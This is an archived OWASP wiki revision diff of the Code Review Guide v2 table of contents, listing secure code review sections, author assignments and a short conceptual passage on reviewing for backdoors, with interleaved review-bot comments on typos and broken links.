Archived OWASP Foundation Wiki (the current OWASP website is https://owasp.org).
Difference between revisions of "OWASP Code Review V2 Table of Contents"
m (Glenn 'devalias' Grant moved page OWASP Code review V2 Table of Contents to OWASP Code Review V2 Table of Contents: Correct capitalisation as used on category page)
(63 intermediate revisions by 14 users not shown)
Line 5: | Line 5: | ||
# Author - Eoin Keary | # Author - Eoin Keary | ||
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Guide_History]] | # Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Guide_History]] | ||
+ | '''[[CRV2_Forward|Content here]]''' | ||
− | == Code Review Guide | + | == Code Review Guide Introduction== |
# Author - Eoin Keary | # Author - Eoin Keary | ||
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Introduction]] | # Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Introduction]] | ||
− | + | '''[[CRV2_Introduction|Content here]]''' | |
− | |||
− | |||
=== What is source code review and Static Analysis === | === What is source code review and Static Analysis === | ||
− | # Author - Zyad Mghazli | + | === What is Code Review === |
+ | # Author - Zyad Mghazli, Eoin Keary | ||
# New Section | # New Section | ||
+ | ''' [[CRV2_WhatIsCodeReview|Content here]]''' | ||
=== Manual Review - Pros and Cons === | === Manual Review - Pros and Cons === | ||
− | # Author - | + | # Author - Zyad Mghazli, Eoin Keary,Gary David Robinson |
# New Section | # New Section | ||
# Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli | # Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli | ||
+ | # [[CRV2_ManualReviewProsCons|Put content here]] | ||
+ | |||
+ | === Advantages of Code Review to Development Practices === | ||
+ | # Author - Gary David Robinson | ||
+ | # New Section | ||
+ | # [[CRV2_AdvantagesToDevPractices|Put content here]] | ||
=== Why code review === | === Why code review === | ||
==== Scope and Objective of secure code review ==== | ==== Scope and Objective of secure code review ==== | ||
# Author - Ashish Rao | # Author - Ashish Rao | ||
+ | # [[CRV2_WhyCodeReview|Put content here]] | ||
=== We can't hack ourselves secure === | === We can't hack ourselves secure === | ||
− | # Author - | + | # Author - Eoin Keary |
# New Section | # New Section | ||
+ | # [[CRV2_CantHackSecure|Put content here]] | ||
=== 360 Review: Coupling source code review and Testing / Hybrid Reviews=== | === 360 Review: Coupling source code review and Testing / Hybrid Reviews=== | ||
− | # Author - | + | # Author - eoin Keary |
# New Section | # New Section | ||
+ | # [[CRV2_360Review|Put content here]] | ||
=== Can static code analyzers do it all? === | === Can static code analyzers do it all? === | ||
# Author - Ashish Rao | # Author - Ashish Rao | ||
# New Section | # New Section | ||
+ | # [[CRV2_CanStaticAnalyzersDoAll|Put content here]] | ||
=Methodology= | =Methodology= | ||
===The code review approach=== | ===The code review approach=== | ||
− | #Author - | + | #Author - Johanna Curiel |
+ | # [[CRV2_CodeReviewApproach|Put content here]] | ||
+ | |||
==== Preparation and context ==== | ==== Preparation and context ==== | ||
− | # Author - | + | # Author - Gary David Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Preparation]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Preparation]] | ||
+ | # [[CRV2_PrepContext|Put content here]] | ||
+ | |||
====Application Threat Modeling==== | ====Application Threat Modeling==== | ||
− | #Author - | + | #Author - Larry Conklin |
# Previous version to be updated: [[https://www.owasp.org/OCRG1.1:Application_Threat_Modeling]] | # Previous version to be updated: [[https://www.owasp.org/OCRG1.1:Application_Threat_Modeling]] | ||
+ | # [[CRV2_AppThreatModeling|Put content here]] | ||
+ | |||
====Understanding Code layout/Design/Architecture==== | ====Understanding Code layout/Design/Architecture==== | ||
− | #Author - | + | #Author - Open |
+ | # [[CRV2_CodeLayoutDesignArch|Put content here]] | ||
+ | ====Understanding Business Logic==== | ||
+ | #[[CRV2_BusinessLogic|Put content here]] | ||
+ | |||
===SDLC Integration=== | ===SDLC Integration=== | ||
− | #Author - | + | #Author - Larry Conklin |
# Previous version to be updated: [[https://www.owasp.org/index.php/Security_Code_Review_in_the_SDLC]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Security_Code_Review_in_the_SDLC]] | ||
+ | # [[CRV2_SDLCInt|Put content here]] | ||
+ | |||
====Deployment Models==== | ====Deployment Models==== | ||
=====Secure deployment configurations===== | =====Secure deployment configurations===== | ||
− | #Author - | + | #Author - |
+ | # [[CRV2_SecDepConfig|Put content here]] | ||
+ | |||
# New Section | # New Section | ||
=====Metrics and code review===== | =====Metrics and code review===== | ||
− | #Author - | + | #Author -[email protected] |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Metrics]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Metrics]] | ||
+ | # [[CRV2_MetricsCodeRev|Put content here]] | ||
+ | |||
=====Source and sink reviews===== | =====Source and sink reviews===== | ||
− | #Author - | + | #Author - Open |
# New Section | # New Section | ||
+ | # [[CRV2_SourceSinkRev|Put content here]] | ||
+ | |||
=====Code review Coverage===== | =====Code review Coverage===== | ||
#Author - Open | #Author - Open | ||
#Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Coverage]] | #Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Coverage]] | ||
+ | # [[CRV2_CodeRevCoverage|Put content here]] | ||
+ | |||
=====Design Reviews===== | =====Design Reviews===== | ||
#Author - Ashish Rao | #Author - Ashish Rao | ||
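Review bot: the "Secure deployment configurations" entry is the only section in this hunk whose author line ("#Author -") was touched but left empty, while every other unassigned section in the revision is marked "Open"; suggest "#Author - Open" so the gap is visible in the assignment list. In the same entry the "# New Section" marker now sits after the "CRV2_SecDepConfig" content link instead of before it as in the other sections. Minor: "Stataic" in the Manual Review suggestion line should be "Static", and the "Metrics and code review" author field holds only an obfuscated e-mail address rather than a name.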
Line 71: | Line 102: | ||
**Design Areas to be reviewed | **Design Areas to be reviewed | ||
**Common Design Flaws | **Common Design Flaws | ||
+ | # [[CRV2_DesignRev|Put content here]] | ||
+ | |||
=====A Risk based approach to code review===== | =====A Risk based approach to code review===== | ||
− | #Author - | + | #Author - Gary David Robinson |
#New Section | #New Section | ||
*"Doing things right or doing the right things..." | *"Doing things right or doing the right things..." | ||
**"Not all bugs are equal | **"Not all bugs are equal | ||
+ | # [[CRV2_RiskBasedApproach|Put content here]] | ||
+ | |||
====Crawling code==== | ====Crawling code==== | ||
− | #Author - | + | #Author - Open |
# Previous version to be updated: [[https://www.owasp.org/index.php/Crawling_Code]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Crawling_Code]] | ||
*API of Interest: | *API of Interest: | ||
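Review bot: in the "A Risk based approach to code review" entry the bullet '**"Not all bugs are equal' opens a quotation mark that is never closed; add the closing mark or drop both so the line matches the quoted bullet above it.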
Line 87: | Line 122: | ||
**Spring | **Spring | ||
**.NET MVC | **.NET MVC | ||
− | ** | + | **Struts |
**Zend | **Zend | ||
#New Section | #New Section | ||
*Searching for code in C/C++ | *Searching for code in C/C++ | ||
− | #Author - | + | #Author - Gary David Robinson |
+ | |||
+ | # [[CRV2_CrawlingCode|Put content here]] | ||
+ | |||
====Code reviews and Compliance==== | ====Code reviews and Compliance==== | ||
− | #Author - | + | #Author -Open |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Reviews_and_Compliance]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Reviews_and_Compliance]] | ||
− | =Reviewing by | + | # [[CRV2_CodeRevCompliance|Put content here]] |
+ | |||
+ | =Reviewing by Technical Control= | ||
===Reviewing code for Authentication controls=== | ===Reviewing code for Authentication controls=== | ||
− | #Author - | + | #Author - Gary Robinson |
+ | # [[CRV2_AuthControls|Put content here]] | ||
+ | |||
====Forgot password==== | ====Forgot password==== | ||
− | #Author Abbas Naderi | + | #Author Abbas Naderi, Larry Conklin |
− | + | # [[CRV2_ForgotPassword|Put content here]] | |
− | + | ||
− | ==== | + | ====CAPTCHA==== |
#Author Larry Conklin, Joan Renchie | #Author Larry Conklin, Joan Renchie | ||
+ | '''[[CRV2_CAPTCHA|Content here]]''' | ||
+ | |||
====Out of Band considerations==== | ====Out of Band considerations==== | ||
− | #Author - | + | #Author - Gary Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authentication]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authentication]] | ||
+ | # [[CRV2_OutofBand|Put content here]] | ||
+ | |||
===Reviewing code Authorization weakness=== | ===Reviewing code Authorization weakness=== | ||
− | #Author | + | #Author Eoin Keary .NET MVC added |
+ | # [[CRV2_AuthorizationWeaknesses|Put content here]] | ||
+ | |||
====Checking authz upon every request==== | ====Checking authz upon every request==== | ||
− | #Author - Abbas Naderi | + | #Author - Abbas Naderi |
+ | # [[CRV2_CheckAuthzEachRequest|Put content here]] | ||
+ | |||
====Reducing the attack surface==== | ====Reducing the attack surface==== | ||
− | #Author | + | #Author Gary Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authorization]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authorization]] | ||
+ | # [[CRV2_ReducingAttSurf|Put content here]] | ||
+ | |||
+ | ====SSL/TLS Implementations==== | ||
+ | #Author - Eoin Keary | ||
+ | # [[CRV2_SSL-TLS|Put content here]] | ||
+ | |||
====Reviewing code for Session handling==== | ====Reviewing code for Session handling==== | ||
− | #Author - | + | #Author - Abbas Naderi |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Session-Management]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Session-Management]] | ||
+ | # [[CRV2_SessionHandling|Put content here]] | ||
+ | |||
====Reviewing client side code==== | ====Reviewing client side code==== | ||
#New Section | #New Section | ||
+ | # [[CRV2_ClientSideCodeIntro|Put content here]] | ||
+ | |||
=====Javascript===== | =====Javascript===== | ||
#Author - Abbas Naderi | #Author - Abbas Naderi | ||
+ | # [[CRV2_ClientSideCodeJScript|Put content here]] | ||
+ | |||
=====JSON===== | =====JSON===== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeJSon|Put content here]] | ||
+ | |||
=====Content Security Policy===== | =====Content Security Policy===== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeContSecPolicy|Put content here]] | ||
+ | |||
====="Jacking"/Framing===== | ====="Jacking"/Framing===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ClientSideCodeJackingFraming|Put content here]] | ||
+ | |||
=====HTML 5?===== | =====HTML 5?===== | ||
− | |||
− | |||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeHTML5|Put content here]] | ||
+ | |||
+ | =====Browser Defenses===== | ||
+ | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeBrowserDefPol|Put content here]] | ||
+ | |||
=====etc...===== | =====etc...===== | ||
+ | |||
====Review code for input validation==== | ====Review code for input validation==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_InputValIntro|Put content here]] | ||
+ | |||
=====Regex Gotchas===== | =====Regex Gotchas===== | ||
− | #Author - | + | #Author - Open |
#New Section | #New Section | ||
+ | # [[CRV2_InputValRegexGotchas|Put content here]] | ||
+ | |||
=====ESAPI===== | =====ESAPI===== | ||
− | #Author - | + | #Author - Open |
+ | #New Section | ||
+ | # Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | ||
+ | # [[CRV2_InputValESAPI|Put content here]] | ||
+ | |||
+ | =====Microsoft Web Protection Library===== | ||
+ | #Author - Michael Hidalgo | ||
#New Section | #New Section | ||
# Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | # Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | ||
+ | # [[CRV2_InputValMicrosoftWebProtectionLibrary|Put content here]] | ||
+ | |||
====Reviewing code for contextual encoding==== | ====Reviewing code for contextual encoding==== | ||
+ | [[Overall approach to content encoding and anti XSS]] | ||
=====HTML Attribute===== | =====HTML Attribute===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ContextEncHTMLAttribute|Put content here]] | ||
+ | |||
=====HTML Entity===== | =====HTML Entity===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ContextEncHTMLEntity|Put content here]] | ||
+ | |||
=====Javascript Parameters===== | =====Javascript Parameters===== | ||
+ | #Author - Eoin Keary | ||
+ | # [[CRV2_ContextEncJscriptParams|Put content here]] | ||
+ | |||
+ | =====JQuery===== | ||
#Author - Open | #Author - Open | ||
− | + | # [[CRV2_ContextEncJQuery|Put content here]] | |
− | + | ||
====Reviewing file and resource handling code==== | ====Reviewing file and resource handling code==== | ||
#Author - Open | #Author - Open | ||
− | + | # [[CRV2_FileResourceHandling|Put content here]] | |
− | #Author - | + | |
+ | ====Resource Exhaustion - error handling==== | ||
+ | #Author - Open | ||
+ | # [[CRV2_ResourceExhaustionErrHandling|Put content here]] | ||
+ | |||
=====native calls===== | =====native calls===== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_ResourceExhaustionNativeCalls|Put content here]] | ||
+ | |||
====Reviewing Logging code - Detective Security==== | ====Reviewing Logging code - Detective Security==== | ||
− | #Author - | + | #Author - Gary Robinson |
* Where to Log | * Where to Log | ||
* What to log | * What to log | ||
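Review bot: under "Hashing & Salting - When, How and Where" the new subheading reads "Encryption" (with a .NET page beneath it), which conflates two different controls: salted hashing is one-way and is what password storage needs, encryption is reversible and brings key management with it, which is exactly the open question Ashish Rao leaves on the following line ("Can we talk about key storage as well"). Suggest either renaming the subheading to match the hashing content or splitting it into "Hashing & Salting" and "Encryption" subsections and answering the key-management question inside the section. Also: the "Reviewing code Authorization weakness" author line "#Author Eoin Keary .NET MVC added" mixes a status note into the author field, and the "ESAPI" and "Microsoft Web Protection Library" entries both carry the same Internal Link to Codereview-Input_Validation, so one of them is probably meant to point elsewhere.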
Line 163: | Line 263: | ||
* How to log | * How to log | ||
# Internal link: [[https://www.owasp.org/index.php/Logging_Cheat_Sheet]] | # Internal link: [[https://www.owasp.org/index.php/Logging_Cheat_Sheet]] | ||
+ | # [[CRV2_LoggingCode|Put content here]] | ||
+ | |||
====Reviewing Error handling and Error messages==== | ====Reviewing Error handling and Error messages==== | ||
− | #Author - | + | #Author - Gary David Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Error-Handling]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Error-Handling]] | ||
+ | # [[CRV2_ErrorHandlingMessages|Put content here]] | ||
+ | |||
====Reviewing Security alerts==== | ====Reviewing Security alerts==== | ||
− | #Author - | + | #Author - Gary Robinson |
+ | # [[CRV2_SecurityAlerts|Put content here]] | ||
+ | |||
====Review for active defense==== | ====Review for active defense==== | ||
#Author - Colin Watson | #Author - Colin Watson | ||
+ | # [[CRV2_ActiveDefense|Put content here]] | ||
+ | |||
====Reviewing Secure Storage==== | ====Reviewing Secure Storage==== | ||
− | #Author - | + | #Author - Open source |
# New Section | # New Section | ||
+ | # [[CRV2_SecureStorage|Put content here]] | ||
+ | |||
====Hashing & Salting - When, How and Where==== | ====Hashing & Salting - When, How and Where==== | ||
− | ===== | + | =====Encryption===== |
======.NET====== | ======.NET====== | ||
#Author Larry Conklin, Joan Renchie | #Author Larry Conklin, Joan Renchie | ||
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Cryptographic_Controls]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Cryptographic_Controls]] | ||
*''Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao'' | *''Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao'' | ||
+ | '''[[CRV2_HashingandSaltingdotNet|Content here]]''' | ||
+ | |||
=Reviewing by Vulnerability= | =Reviewing by Vulnerability= | ||
===Review Code for XSS=== | ===Review Code for XSS=== | ||
− | #Author | + | #Author Examples added by Eoin Keary |
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Scripting]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Scripting]] | ||
# In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao | # In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao | ||
+ | # [[CRV2_RevCodeXSS|Put content here]] | ||
+ | |||
===Persistent - The Anti pattern=== | ===Persistent - The Anti pattern=== | ||
− | #Author | + | #Author |
+ | # [[CRV2_RevCodePersistentAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Eoin Keary |
+ | # [[CRV2_RevCodePersistentAntiPatterndotNet|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodePersistentAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Abbas Naderi |
+ | # [[CRV2_RevCodePersistentAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_RevCodePersistentAntiPatternRuby|Put content here]] | ||
+ | |||
===Reflected - The Anti pattern=== | ===Reflected - The Anti pattern=== | ||
+ | # [[CRV2_RevCodeReflectedAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeReflectedAntiPatterndotNet|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeReflectedAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Abbas Naderi |
+ | # [[CRV2_RevCodeReflectedAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
+ | # Author - Open | ||
+ | # [[CRV2_RevCodeReflectedAntiPatternIRuby|Put content here]] | ||
+ | |||
===Stored - The Anti pattern=== | ===Stored - The Anti pattern=== | ||
+ | # Author - Johanna Curiel | ||
+ | # [[CRV2_RevCodeStoredAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatterndotNET|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
+ | #Author - Johanna Curiel | ||
+ | # [[CRV2_RevCodeStoredAntiPatternRuby|Put content here]] | ||
+ | |||
===DOM XSS === | ===DOM XSS === | ||
#Author Larry Conklin | #Author Larry Conklin | ||
+ | # [[CRV2_DOMXSS|Put content here]] | ||
+ | |||
===JQuery mistakes=== | ===JQuery mistakes=== | ||
− | #Author | + | #Author |
− | ===Reviewing code for SQL Injection | + | # [[CRV2_JQueryMistakes|Put content here]] |
− | #Author | + | |
+ | ===Reviewing code for SQL Injection=== | ||
+ | #Author Gary Robinson | ||
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection]] | ||
+ | # [[CRV2_RevCodeSQLInjection|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author - | + | #Author - Mennouchi Islam Azeddine |
+ | # [[CRV2_SQLInjPHP|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author - | + | #Author - Johanna Curiel |
+ | # [[CRV2_SQLInjJava|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SQLInjdotNET|Put content here]] | ||
+ | |||
====HQL==== | ====HQL==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SQLInjHQL|Put content here]] | ||
+ | |||
===The Anti pattern=== | ===The Anti pattern=== | ||
+ | #Author Larry Conklin | ||
+ | #[[CRV2_AntiPattern| Content here]] | ||
+ | https://www.owasp.org/index.php/CRV2_AntiPattern | ||
====PHP==== | ====PHP==== | ||
− | #Author - | + | #Author - |
+ | # [[CRV2_AntiPatternPHP|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author - | + | #Author - |
#=> Searching for traditional SQL,JPA,JPSQL,Criteria,... | #=> Searching for traditional SQL,JPA,JPSQL,Criteria,... | ||
+ | # [[CRV2_AntiPatternJava|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_AntiPatterndotNet|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_AntiPatternRuby|Put content here]] | ||
+ | |||
====Cold Fusion==== | ====Cold Fusion==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_AntiPatternColdFusion|Put content here]] | ||
+ | |||
===Reviewing code for CSRF Issues=== | ===Reviewing code for CSRF Issues=== | ||
− | #Author | + | #Author Abbas Naderi |
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Request_Forgery]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Request_Forgery]] | ||
− | ===Transactional logic / Non idempotent functions / State Changing Functions=== | + | # This page needs to be deleted. [[CRV2_CSRFIssues|Put content here]] |
− | # | + | |
+ | ===(This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions=== | ||
+ | # [[CRV2_TransLogic|Put content here]] | ||
+ | |||
===Reviewing code for poor logic /Business logic/Complex authorization=== | ===Reviewing code for poor logic /Business logic/Complex authorization=== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_PoorLogic|Put content here]] | ||
+ | |||
===Reviewing Secure Communications=== | ===Reviewing Secure Communications=== | ||
====.NET Config==== | ====.NET Config==== | ||
#Author Johanna Curiel, Renchie Joan | #Author Johanna Curiel, Renchie Joan | ||
+ | # [[CRV2_SecCommsdotNet|Put content here]] | ||
+ | |||
====Spring Config==== | ====Spring Config==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SecCommsSpringConfig|Put content here]] | ||
+ | |||
====HTTP Headers==== | ====HTTP Headers==== | ||
− | #Author | + | #Author Gary Robinson |
− | + | # [[CRV2_SecCommsHTTPHdrs|Put content here]] | |
− | # | + | |
− | |||
− | |||
===Tech-Stack pitfalls=== | ===Tech-Stack pitfalls=== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_TechStackPitfalls|Put content here]] | ||
+ | |||
===Framework specific Issues=== | ===Framework specific Issues=== | ||
====Spring==== | ====Spring==== | ||
#Author - Open | #Author - Open | ||
− | ==== | + | # [[CRV2_FrameworkSpecIssuesSpring|Put content here]] |
+ | |||
+ | ====Struts==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesStruts|Put content here]] | ||
+ | |||
====Drupal==== | ====Drupal==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesDrupal|Put content here]] | ||
+ | |||
====Ruby on Rails==== | ====Ruby on Rails==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesROR|Put content here]] | ||
+ | |||
====Django==== | ====Django==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesDjango|Put content here]] | ||
+ | |||
====.NET Security / MVC==== | ====.NET Security / MVC==== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Eoin Keary |
+ | # [[CRV2_FrameworkSpecIssuesdotNetMVC|Put content here]] | ||
+ | |||
====Security in ASP.NET applications==== | ====Security in ASP.NET applications==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNet|Put content here]] | ||
+ | |||
=====Strongly Named Assemblies===== | =====Strongly Named Assemblies===== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Larry Conklin |
+ | # [[CRV2_FrameworkSpecIssuesASPNetStrongAssembiles|Put content here]] | ||
+ | |||
======Round Tripping====== | ======Round Tripping====== | ||
+ | # Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesASPNetRT|Put content here]] | ||
+ | |||
======How to prevent Round tripping====== | ======How to prevent Round tripping====== | ||
− | #Author Johanna Curiel | + | # Author - Open |
+ | #Author Johanna Curiel | ||
+ | # [[CRV2_FrameworkSpecIssuesASPNetRTPrevention|Put content here]] | ||
+ | |||
=====Setting the right Configurations===== | =====Setting the right Configurations===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetConfigs|Put content here]] | ||
+ | |||
=====Authentication Options===== | =====Authentication Options===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetAuth|Put content here]] | ||
+ | |||
=====Code Review for Managed Code - .Net 1.0 and up===== | =====Code Review for Managed Code - .Net 1.0 and up===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetManagedCode|Put content here]] | ||
+ | |||
=====Using OWASP Top 10 as your guideline===== | =====Using OWASP Top 10 as your guideline===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPTop10|Put content here]] | ||
+ | |||
=====Code review for Unsafe Code (C#)===== | =====Code review for Unsafe Code (C#)===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetUnsafeCode|Put content here]] | ||
+ | |||
====PHP Specific Issues==== | ====PHP Specific Issues==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesPHP|Put content here]] | ||
+ | |||
====Classic ASP==== | ====Classic ASP==== | ||
#Author Johanna Curiel | #Author Johanna Curiel | ||
+ | # [[CRV2_FrameworkSpecIssuesASPClassic|Put content here]] | ||
+ | |||
====C#==== | ====C#==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesCsharp|Put content here]] | ||
+ | |||
====C/C++==== | ====C/C++==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesCplusplus|Put content here]] | ||
+ | |||
====Objective C==== | ====Objective C==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesObectiveC|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesJava|Put content here]] | ||
+ | |||
====Android==== | ====Android==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesAndroid|Put content here]] | ||
+ | |||
====Coldfusion==== | ====Coldfusion==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesColdfusion|Put content here]] | ||
+ | |||
+ | ====CodeIgniter==== | ||
+ | |||
+ | # Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesCodeIgniter|Put content here]] | ||
+ | |||
=Security code review for Agile development= | =Security code review for Agile development= | ||
− | #Author | + | #Author Carlos Pantelides |
− | = | + | # [[CRV2_CodeReviewAgile|Put content here]] |
− | + | ||
− | + | =Code Review for Backdoors= | |
+ | #Author Yiannis Pavlosoglou | ||
+ | The review of a piece of source code for backdoors has one excruciating difference to a traditional source code review: The fact that someone with 'commit' or 'write' access to the source code repository has malicious intentions spanning well beyond their current developer remit. Because of this difference, a code review for backdoors is often seen as a very specialised review and can sometimes be considered not a code review per say. | ||
+ | |||
+ | A traditional code review has the objective of determining if a vulnerability is present within the code, further to this if the vulnerability is exploitable and under what conditions. A code review for backdoors has the objective to determine if a certain portion of the codebase is carrying code that is unnecessary for the logic and implementation of the use cases it serves. | ||
+ | |||
+ | Further to this, the reviewer, looks for the trigger points of that logic. Typical examples include a branch statement going off to a part of assembly or obfuscated code. The reviewer is looking for patterns of abnormality in terms of code segments that would not be expected to be present under normal conditions. | ||
+ | |||
+ | An excellent introduction into how to look for rootkits in the Java programming language can be found [https://www.blackhat.com/presentations/bh-usa-09/WILLIAMS/BHUSA09-Williams-EnterpriseJavaRootkits-PAPER.pdf here]. In this paper J. Williams covers a variety of backdoor examples including file system access through a web server, as well as time based attacks involving a key aspect of malicious functionality been made available after a certain amount of time. Such examples form the foundation of what any reviewer for back doors should try to automate, regardless of the language in which the review is taking place. | ||
+ | |||
+ | =Code Review Tools= | ||
+ | https://www.owasp.org/index.php/CRV2_CodeReviewTools |
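Review bot: the CSRF entry now both says "This page needs to be deleted" and adds a content link to CRV2_CSRFIssues, so a reader cannot tell whether the section is staying; keep one or the other. "How to prevent Round tripping" ends up with two author lines ("# Author - Open" and "#Author Johanna Curiel"). Three new page links carry spelling errors that will create separately named wiki pages: CRV2_RevCodeReflectedAntiPatternIRuby (stray "I"), CRV2_FrameworkSpecIssuesASPNetStrongAssembiles ("Assembiles") and CRV2_FrameworkSpecIssuesObectiveC ("Obective"). In the "Code Review for Backdoors" text, "per say" should be "per se" and "been made available" should be "being made available"; the new "Code Review Tools" section is a bare URL with no description of what the linked page covers.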
Latest revision as of 01:27, 8 January 2016
- 1 OWASP Code Review Guide v2.0:
